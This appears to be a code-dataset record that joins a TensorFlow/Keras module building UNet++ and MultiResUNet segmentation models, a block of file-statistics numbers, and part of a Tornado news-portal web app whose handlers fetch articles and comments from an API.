            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
        elif self.problem_type == 'Regression':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
        model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
        if self.D_S == 1:
            # Deep supervision: final output first, then the collected levels.
            levels.append(outputs)
            levels.reverse()
            model = tf.keras.Model(inputs=[inputs], outputs=levels)
        return model
    def UNetP_v2(self):
        """Build the UNet+ model, v2: transposed convolutions for upsampling.

        Same topology as :meth:`UNetP` but each upsampling uses
        ``trans_conv2D`` (learned Conv2DTranspose) instead of ``upConv_Block``.
        Returns a ``tf.keras.Model``.
        """
        # NOTE(review): invalid hyper-parameters only print a warning here.
        if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
            print("ERROR: Please Check the Values of the Input Parameters!")
        convs = {}    # encoder stage outputs for the skip connections
        levels = []   # deep-supervision side outputs
        i = 1
        # Encoding
        inputs = tf.keras.Input((self.length, self.width, self.num_channel))
        conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
        convs["conv%s" % i] = conv
        for i in range(2, (self.model_depth + 1)):
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
            pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(conv)
            convs["conv%s" % i] = conv
        # Collect Latent Features or Embeddings from AutoEncoders
        if self.A_E == 0:
            conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        elif self.A_E == 1:
            # assumes a square input (self.length used for both dims) — TODO confirm
            latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
            conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
            conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
        else:
            print("ERROR: Please Check the Values of the Input Parameters!")
        # Decoding
        convs_list = list(convs.values())
        if self.D_S == 1:
            # Side output at full resolution from the first encoder stage.
            level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(convs_list[0])
            levels.append(level)
        # NOTE(review): "deconv%s%s" keys are ambiguous for model_depth >= 10.
        deconvs = {}
        for i in range(1, (self.model_depth + 1)):
            for j in range(0, (self.model_depth - i + 1)):
                if (i == 1) and (j == (self.model_depth - 1)):
                    # First stage, deepest level: upsample the bottleneck.
                    deconv = trans_conv2D(conv, self.model_width, 2 ** j)
                    deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif (i == 1) and (j < (self.model_depth - 1)):
                    # First stage, shallower levels: upsample the encoder output below.
                    deconv = trans_conv2D(convs_list[j + 1], self.model_width, 2 ** j)
                    deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                elif i > 1:
                    # Later stages: fuse the same-level previous-stage node with the upsampled node below.
                    deconv = trans_conv2D(deconvs["deconv%s%s" % ((j + 1), (i - 1))], self.model_width, 2 ** j)
                    deconv = Conv_Block(Concat_Block(deconvs["deconv%s%s" % (j, (i - 1))], deconv), self.model_width, self.kernel_size, 2 ** j)
                    deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                    deconvs["deconv%s%s" % (j, i)] = deconv
                if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
                    # Side output from each intermediate full-resolution node.
                    level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
                    levels.append(level)
        deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
        # Output
        outputs = []
        if self.problem_type == 'Classification':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
        elif self.problem_type == 'Regression':
            outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
        model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
        if self.D_S == 1:
            # Deep supervision: final output first, then the collected levels.
            levels.append(outputs)
            levels.reverse()
            model = tf.keras.Model(inputs=[inputs], outputs=levels)
        return model
def UNetPP(self):
    """Build a variable-depth UNet++ model (2D, upsampling decoder).

    Encoder: ``model_depth`` levels of two stacked ``Conv_Block``s followed by
    2x2 max-pooling.  Bottleneck: two more ``Conv_Block``s, optionally preceded
    by a ``Feature_Extraction_Block`` latent squeeze when the network doubles
    as an AutoEncoder (``A_E == 1``).  Decoder: the UNet++ nested dense skip
    pathway — node (j, i) concatenates the encoder feature at depth j, every
    earlier decoder node at depth j, and the upsampled node (j + 1, i - 1).
    With Deep Supervision (``D_S == 1``) a 1x1 conv head is attached at each
    resolution level and a multi-output model is returned.

    Returns:
        tf.keras.Model mapping the input tensor of shape
        (length, width, num_channel) to the segmentation/regression output(s).

    Raises:
        ValueError: if a structural hyper-parameter is 0, or ``A_E`` /
            ``problem_type`` holds an unsupported value.
    """
    if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
        # Previously this only printed and continued, crashing later with an
        # obscure error; fail fast instead.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    convs = {}
    levels = []
    i = 1
    # Encoding
    inputs = tf.keras.Input((self.length, self.width, self.num_channel))
    conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
    conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
    pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(conv)
    convs["conv%s" % i] = conv
    for i in range(2, (self.model_depth + 1)):
        conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(conv)
        convs["conv%s" % i] = conv
    # Bottleneck — collect latent features/embeddings in AutoEncoder mode.
    if self.A_E == 0:
        conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
    elif self.A_E == 1:
        latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
        conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
    else:
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    # Decoding
    convs_list = list(convs.values())
    if self.D_S == 1:
        # Deepest supervision head taps the highest-resolution encoder level.
        level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(convs_list[0])
        levels.append(level)
    deconvs = {}
    for i in range(1, (self.model_depth + 1)):
        for j in range(0, (self.model_depth - i + 1)):
            if (i == 1) and (j == (self.model_depth - 1)):
                # First decoder column, deepest node: upsample the bottleneck.
                deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(conv)), self.model_width, self.kernel_size, 2 ** j)
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                deconvs["deconv%s%s" % (j, i)] = deconv
            elif (i == 1) and (j < (self.model_depth - 1)):
                # First decoder column elsewhere: upsample the next-deeper encoder level.
                deconv = Conv_Block(Concat_Block(convs_list[j], upConv_Block(convs_list[j + 1])), self.model_width, self.kernel_size, 2 ** j)
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                deconvs["deconv%s%s" % (j, i)] = deconv
            elif i > 1:
                # Dense skip: gather every earlier decoder node at this depth.
                deconv_tot = deconvs["deconv%s%s" % (j, 1)]
                for k in range(2, i):
                    deconv_temp = deconvs["deconv%s%s" % (j, k)]
                    deconv_tot = Concat_Block(deconv_tot, deconv_temp)
                deconv = Conv_Block(Concat_Block(convs_list[j], deconv_tot, upConv_Block(deconvs["deconv%s%s" % ((j + 1), (i - 1))])), self.model_width, self.kernel_size, 2 ** j)
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                deconvs["deconv%s%s" % (j, i)] = deconv
            if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
                level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
                levels.append(level)
    deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
    # Output head.
    if self.problem_type == 'Classification':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
    elif self.problem_type == 'Regression':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
    else:
        # Previously 'outputs' silently stayed [] and an unusable Model was built.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    if self.D_S == 1:
        levels.append(outputs)
        levels.reverse()
        model = tf.keras.Model(inputs=[inputs], outputs=levels)
    return model
def UNetPP_v2(self):
    """Build a variable-depth UNet++ model, Version 2 (2D, transposed-conv decoder).

    Identical topology to :meth:`UNetPP` except that every decoder upsampling
    step uses a learned ``trans_conv2D`` instead of ``upConv_Block``.

    Returns:
        tf.keras.Model mapping the input tensor to the segmentation/regression
        output(s); a multi-output model when Deep Supervision is enabled.

    Raises:
        ValueError: if a structural hyper-parameter is 0, or ``A_E`` /
            ``problem_type`` holds an unsupported value.
    """
    if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
        # Fail fast instead of printing and building a broken graph.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    convs = {}
    levels = []
    i = 1
    # Encoding
    inputs = tf.keras.Input((self.length, self.width, self.num_channel))
    conv = Conv_Block(inputs, self.model_width, self.kernel_size, 2 ** 0)
    conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** 0)
    pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(conv)
    convs["conv%s" % i] = conv
    for i in range(2, (self.model_depth + 1)):
        conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** (i - 1))
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** (i - 1))
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(conv)
        convs["conv%s" % i] = conv
    # Bottleneck — collect latent features/embeddings in AutoEncoder mode.
    if self.A_E == 0:
        conv = Conv_Block(pool, self.model_width, self.kernel_size, 2 ** self.model_depth)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
    elif self.A_E == 1:
        latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
        conv = Conv_Block(latent, self.model_width, self.kernel_size, 2 ** self.model_depth)
        conv = Conv_Block(conv, self.model_width, self.kernel_size, 2 ** self.model_depth)
    else:
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    # Decoding
    convs_list = list(convs.values())
    if self.D_S == 1:
        # Deepest supervision head taps the highest-resolution encoder level.
        level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(convs_list[0])
        levels.append(level)
    deconvs = {}
    for i in range(1, (self.model_depth + 1)):
        for j in range(0, (self.model_depth - i + 1)):
            if (i == 1) and (j == (self.model_depth - 1)):
                # First decoder column, deepest node: transpose-conv the bottleneck up.
                deconv = trans_conv2D(conv, self.model_width, 2 ** j)
                deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                deconvs["deconv%s%s" % (j, i)] = deconv
            elif (i == 1) and (j < (self.model_depth - 1)):
                # First decoder column elsewhere: upsample the next-deeper encoder level.
                deconv = trans_conv2D(convs_list[j + 1], self.model_width, 2 ** j)
                deconv = Conv_Block(Concat_Block(convs_list[j], deconv), self.model_width, self.kernel_size, 2 ** j)
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                deconvs["deconv%s%s" % (j, i)] = deconv
            elif i > 1:
                # Dense skip: gather every earlier decoder node at this depth.
                deconv_tot = deconvs["deconv%s%s" % (j, 1)]
                for k in range(2, i):
                    deconv_temp = deconvs["deconv%s%s" % (j, k)]
                    deconv_tot = Concat_Block(deconv_tot, deconv_temp)
                deconv = trans_conv2D(deconvs["deconv%s%s" % ((j + 1), (i - 1))], self.model_width, 2 ** j)
                deconv = Conv_Block(Concat_Block(convs_list[j], deconv_tot, deconv), self.model_width, self.kernel_size, 2 ** j)
                deconv = Conv_Block(deconv, self.model_width, self.kernel_size, 2 ** j)
                deconvs["deconv%s%s" % (j, i)] = deconv
            if (self.D_S == 1) and (j == 0) and (i < self.model_depth):
                level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - i}')(deconvs["deconv%s%s" % (j, i)])
                levels.append(level)
    deconv = deconvs["deconv%s%s" % (0, self.model_depth)]
    # Output head.
    if self.problem_type == 'Classification':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
    elif self.problem_type == 'Regression':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
    else:
        # Previously 'outputs' silently stayed [] and an unusable Model was built.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    if self.D_S == 1:
        levels.append(outputs)
        levels.reverse()
        model = tf.keras.Model(inputs=[inputs], outputs=levels)
    return model
def MultiResUNet(self):
    """2D MultiResUNet with optional Deep Supervision and AutoEncoder modes.

    (The original docstring said "1D", but every layer here — Conv2D,
    MaxPooling2D — is two-dimensional.)

    Encoder: ``model_depth`` MultiResBlocks with 2x2 max-pooling; each skip
    connection is routed through a ``ResPath`` whose length shrinks with depth.
    Decoder: upsampling (``upConv_Block``) + ResPath concatenation + MultiResBlock
    per level.  ``D_S == 1`` adds a 1x1 conv supervision head per level;
    ``A_E == 1`` inserts a latent ``Feature_Extraction_Block`` at the bottleneck.

    Returns:
        tf.keras.Model; multi-output when Deep Supervision is enabled.

    Raises:
        ValueError: if a structural hyper-parameter is 0, or ``A_E`` / ``D_S`` /
            ``problem_type`` holds an unsupported value.
    """
    if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
        # Fail fast instead of printing and building a broken graph.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    if self.A_E not in (0, 1) or self.D_S not in (0, 1):
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    mresblocks = {}
    levels = []
    i = 1
    # Encoding
    inputs = tf.keras.Input((self.length, self.width, self.num_channel))
    mresblock = MultiResBlock(inputs, self.model_width, self.kernel_size, 2 ** 0, self.alpha)
    pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(mresblock)
    mresblocks["mres%s" % i] = ResPath(mresblock, self.model_depth, self.model_width, self.kernel_size, 2 ** 0)
    for i in range(2, (self.model_depth + 1)):
        mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** (i - 1), self.alpha)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(mresblock)
        # Shallower levels get longer ResPaths (depth - i + 1 residual units).
        mresblocks["mres%s" % i] = ResPath(mresblock, (self.model_depth - i + 1), self.model_width, self.kernel_size, 2 ** (i - 1))
    # Bottleneck — collect latent features/embeddings in AutoEncoder mode.
    if self.A_E == 1:
        pool = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
    mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
    if self.D_S == 1:
        # Deepest supervision head.
        level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(mresblock)
        levels.append(level)
    # Decoding
    mresblocks_list = list(mresblocks.values())
    deconv = MultiResBlock(Concat_Block(upConv_Block(mresblock), mresblocks_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1), self.alpha)
    for j in range(1, self.model_depth):
        if self.D_S == 1:
            # Supervision head on the previous decoder level's output.
            level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - j}')(deconv)
            levels.append(level)
        deconv = MultiResBlock(Concat_Block(upConv_Block(deconv), mresblocks_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1), self.alpha)
    # Output head.
    if self.problem_type == 'Classification':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
    elif self.problem_type == 'Regression':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
    else:
        # Previously 'outputs' silently stayed [] and an unusable Model was built.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    if self.D_S == 1:
        levels.append(outputs)
        levels.reverse()
        model = tf.keras.Model(inputs=[inputs], outputs=levels)
    return model
def MultiResUNet_v2(self):
    """2D MultiResUNet, Version 2: transposed-conv decoder.

    (The original docstring said "1D", but every layer here is two-dimensional.)
    Identical topology to :meth:`MultiResUNet` except that decoder upsampling
    uses a learned ``trans_conv2D`` instead of ``upConv_Block``.

    Returns:
        tf.keras.Model; multi-output when Deep Supervision is enabled.

    Raises:
        ValueError: if a structural hyper-parameter is 0, or ``A_E`` / ``D_S`` /
            ``problem_type`` holds an unsupported value.
    """
    if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
        # Fail fast instead of printing and building a broken graph.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    if self.A_E not in (0, 1) or self.D_S not in (0, 1):
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    mresblocks = {}
    levels = []
    i = 1
    # Encoding
    inputs = tf.keras.Input((self.length, self.width, self.num_channel))
    mresblock = MultiResBlock(inputs, self.model_width, self.kernel_size, 2 ** 0, self.alpha)
    pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(mresblock)
    mresblocks["mres%s" % i] = ResPath(mresblock, self.model_depth, self.model_width, self.kernel_size, 2 ** 0)
    for i in range(2, (self.model_depth + 1)):
        mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** (i - 1), self.alpha)
        pool = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(mresblock)
        # Shallower levels get longer ResPaths (depth - i + 1 residual units).
        mresblocks["mres%s" % i] = ResPath(mresblock, (self.model_depth - i + 1), self.model_width, self.kernel_size, 2 ** (i - 1))
    # Bottleneck — collect latent features/embeddings in AutoEncoder mode.
    if self.A_E == 1:
        pool = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
    mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
    if self.D_S == 1:
        # Deepest supervision head.
        level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth}')(mresblock)
        levels.append(level)
    # Decoding
    mresblocks_list = list(mresblocks.values())
    deconv = MultiResBlock(Concat_Block(trans_conv2D(mresblock, self.model_width, 2 ** (self.model_depth - 1)), mresblocks_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1), self.alpha)
    for j in range(1, self.model_depth):
        if self.D_S == 1:
            # Supervision head on the previous decoder level's output.
            level = tf.keras.layers.Conv2D(1, (1, 1), name=f'level{self.model_depth - j}')(deconv)
            levels.append(level)
        deconv = MultiResBlock(Concat_Block(trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1)), mresblocks_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1), self.alpha)
    # Output head.
    if self.problem_type == 'Classification':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
    elif self.problem_type == 'Regression':
        outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
    else:
        # Previously 'outputs' silently stayed [] and an unusable Model was built.
        raise ValueError("ERROR: Please Check the Values of the Input Parameters!")
    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    if self.D_S == 1:
        levels.append(outputs)
        levels.reverse()
        model = tf.keras.Model(inputs=[inputs], outputs=levels)
    return model
| 55.103104
| 250
| 0.589119
| 6,706
| 49,703
| 4.213093
| 0.033105
| 0.117545
| 0.092663
| 0.101228
| 0.919301
| 0.912469
| 0.903904
| 0.899586
| 0.89548
| 0.893003
| 0
| 0.023618
| 0.276764
| 49,703
| 901
| 251
| 55.164262
| 0.762345
| 0.051486
| 0
| 0.889543
| 0
| 0
| 0.069727
| 0.01177
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02651
| false
| 0
| 0.001473
| 0
| 0.054492
| 0.035346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fd55dbfb5d52856551cb41a03f1bb3ea8af9663
| 52,676
|
py
|
Python
|
foo/portal/newsup.py
|
ThomasZh/legend-league-portal
|
df06ac05ea506c3e257517716b6d692b69c8bf6b
|
[
"Apache-2.0"
] | null | null | null |
foo/portal/newsup.py
|
ThomasZh/legend-league-portal
|
df06ac05ea506c3e257517716b6d692b69c8bf6b
|
[
"Apache-2.0"
] | null | null | null |
foo/portal/newsup.py
|
ThomasZh/legend-league-portal
|
df06ac05ea506c3e257517716b6d692b69c8bf6b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# _*_ coding: utf-8_*_
#
# Copyright 2016 planc2c.com
# thomas@time2box.com
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tornado.web
import logging
import time
import sys
import os
import uuid
import smtplib
import json as JSON # 启用别名,不会跟方法里的局部变量混淆
from bson import json_util
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../"))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../dao"))
from tornado.escape import json_encode, json_decode
from tornado.httpclient import *
from tornado.httputil import url_concat
from bson import json_util
from comm import *
from global_const import *
class WxMpVerifyHandler(tornado.web.RequestHandler):
    """Answer the WeChat MP platform's server-verification request."""

    def get(self):
        # WeChat expects this fixed token echoed back verbatim.
        self.finish('qdkkOWgyqqLTrijx')
        return
class NewsupLoginNextHandler(tornado.web.RequestHandler):
    """After login, send the user back to the page that started the flow."""

    def get(self):
        # The login flow stores the originating page in a secure cookie;
        # fall back to the portal index when it is absent.
        target = self.get_secure_cookie("login_next")
        logging.info("got login_next %r", target)
        if target:
            self.redirect(target)
        else:
            self.redirect("/portal/newsup/index")
class NewsupIndexHandler(BaseHandler):
    """Portal home page: aggregates league info, clubs, article sections,
    latest comments, multimedia and the notice board into one template.

    The original handler repeated the same fetch/log/decode boilerplate
    eleven times; it is factored into the private helpers below.  Behavior
    (URLs, request order, logging, payload handling) is unchanged.
    """

    @staticmethod
    def _fetch_rs(url, params):
        """GET *url* with query *params* and return the decoded 'rs' payload.

        NOTE(review): the synchronous HTTPClient blocks tornado's IOLoop for
        the whole round trip — AsyncHTTPClient would be preferable here.
        """
        response = HTTPClient().fetch(url_concat(url, params), method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    @classmethod
    def _fetch_articles(cls, params, time_key='publish_time'):
        """Fetch an article list; humanize *time_key* unless it is None."""
        articles = cls._fetch_rs(API_DOMAIN + "/api/articles", params)
        if time_key:
            for article in articles:
                article[time_key] = timestamp_friendly_date(article[time_key])
        return articles

    @classmethod
    def _fetch_clubs(cls, franchise_type):
        """Fetch the first page of league clubs of the given type."""
        params = {"filter": "league", "franchise_type": franchise_type, "page": 1, "limit": 5}
        rs = cls._fetch_rs(API_DOMAIN + "/api/leagues/" + LEAGUE_ID + "/clubs", params)
        clubs = rs['data']
        for club in clubs:
            club['create_time'] = timestamp_friendly_date(club['create_time'])
        return clubs

    def get(self):
        logging.info(self.request)
        # League info shown in the common page chrome.
        league_info = self.get_league_info()
        # Clubs: scenic areas ("景区") and suppliers ("供应商").
        franchises = self._fetch_clubs("景区")
        suppliers = self._fetch_clubs("供应商")
        # Article sections, keyed by fixed category ids.
        base = {"filter": "league", "league_id": LEAGUE_ID, "status": "publish"}
        sceneries = self._fetch_articles(dict(base, category="41c057a6f73411e69a3c00163e023e51", idx=0, limit=5))   # scenic spots
        journeies = self._fetch_articles(dict(base, category="01d6120cf73411e69a3c00163e023e51", idx=0, limit=12))  # travel journals
        activities = self._fetch_articles(dict(base, category="0bbf89e2f73411e69a3c00163e023e51", idx=0, limit=4), time_key=None)  # activities (raw timestamps)
        news = self._fetch_articles(dict(base, idx=0, limit=6))                                                     # most recent, any category
        populars = self._fetch_articles(dict(base, category="3801d62cf73411e69a3c00163e023e51", idx=0, limit=4))    # popular
        hots = self._fetch_articles(dict(base, category="1b86ad38f73411e69a3c00163e023e51", idx=0, limit=12))       # hot news
        # Latest comments.
        lastest_comments = self._fetch_rs(API_DOMAIN + "/api/last-comments",
                                          {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 5})
        for comment in lastest_comments:
            comment['create_time'] = timestamp_friendly_date(comment['create_time'])
        # Multimedia gallery.
        multimedias = self._fetch_rs(API_DOMAIN + "/api/multimedias",
                                     {"filter": "league", "league_id": LEAGUE_ID, "idx": 0, "limit": 8})
        for multimedia in multimedias:
            multimedia['publish_time'] = timestamp_friendly_date(multimedia['publish_time'])
        # Notice board (paged payload: 'rs' wraps a 'data' list).
        notices = self._fetch_rs(API_DOMAIN + "/api/notice-board",
                                 {"filter": "league", "league_id": LEAGUE_ID, "page": 1, "limit": 3})
        is_login = False
        access_token = self.get_secure_cookie("access_token")
        logging.info("got access_token>>>>> %r", access_token)
        if access_token:
            is_login = True
        self.render('newsup/index.html',
                    is_login=is_login,
                    franchises=franchises,
                    suppliers=suppliers,
                    sceneries=sceneries,
                    journeies=journeies,
                    news=news,
                    populars=populars,
                    hots=hots,
                    league_info=league_info,
                    activities=activities,
                    lastest_comments=lastest_comments,
                    multimedias=multimedias,
                    api_domain=API_DOMAIN,
                    notices=notices['data'])
class NewsupAccountHandler(AuthorizationHandler):
    """Account page for the logged-in user: profile plus UPYUN upload settings."""

    @tornado.web.authenticated  # if no session, redirect to login page
    def get(self):
        logging.info(self.request)
        access_token = self.get_secure_cookie("access_token")
        is_login = bool(access_token)
        # League info shown in the common page chrome.
        league_info = self.get_league_info()
        # Fetch the caller's own profile with the bearer token.
        # NOTE(review): get_secure_cookie returns bytes on Python 3, which would
        # break this str concatenation — presumably this runs on Python 2; confirm.
        response = HTTPClient().fetch(
            API_DOMAIN + "/api/myinfo?filter=login",
            method="GET",
            headers={"Authorization": "Bearer " + access_token})
        logging.info("got response %r", response.body)
        user = json_decode(response.body)['rs']
        self.render('newsup/account.html',
                    is_login=is_login,
                    league_info=league_info,
                    user=user,
                    access_token=access_token,
                    api_domain=API_DOMAIN,
                    upyun_domain=UPYUN_DOMAIN,
                    upyun_notify_url=UPYUN_NOTIFY_URL,
                    upyun_form_api_secret=UPYUN_FORM_API_SECRET,
                    upyun_bucket=UPYUN_BUCKET)
class NewsupAuthorHandler(BaseHandler):
    """Author page: news, popular and activity article lists plus latest comments.

    The repeated fetch/log/decode boilerplate of the original is factored into
    the private helpers below; behavior (URLs, request order, logging) is
    unchanged.
    """

    @staticmethod
    def _fetch_rs(url, params):
        """GET *url* with query *params* and return the decoded 'rs' payload.

        NOTE(review): the synchronous HTTPClient blocks tornado's IOLoop for
        the whole round trip — AsyncHTTPClient would be preferable here.
        """
        response = HTTPClient().fetch(url_concat(url, params), method="GET")
        logging.info("got response %r", response.body)
        return json_decode(response.body)['rs']

    @classmethod
    def _fetch_articles(cls, params, time_key='publish_time'):
        """Fetch an article list; humanize *time_key* unless it is None."""
        articles = cls._fetch_rs(API_DOMAIN + "/api/articles", params)
        if time_key:
            for article in articles:
                article[time_key] = timestamp_friendly_date(article[time_key])
        return articles

    def get(self):
        logging.info(self.request)
        access_token = self.get_secure_cookie("access_token")
        is_login = bool(access_token)
        # League info shown in the common page chrome.
        league_info = self.get_league_info()
        # Article sections, keyed by fixed category ids.
        base = {"filter": "league", "league_id": LEAGUE_ID, "status": "publish"}
        news = self._fetch_articles(dict(base, category="30a56cb8f73411e69a3c00163e023e51", idx=0, limit=6))      # news
        populars = self._fetch_articles(dict(base, category="3801d62cf73411e69a3c00163e023e51", idx=0, limit=6))  # popular
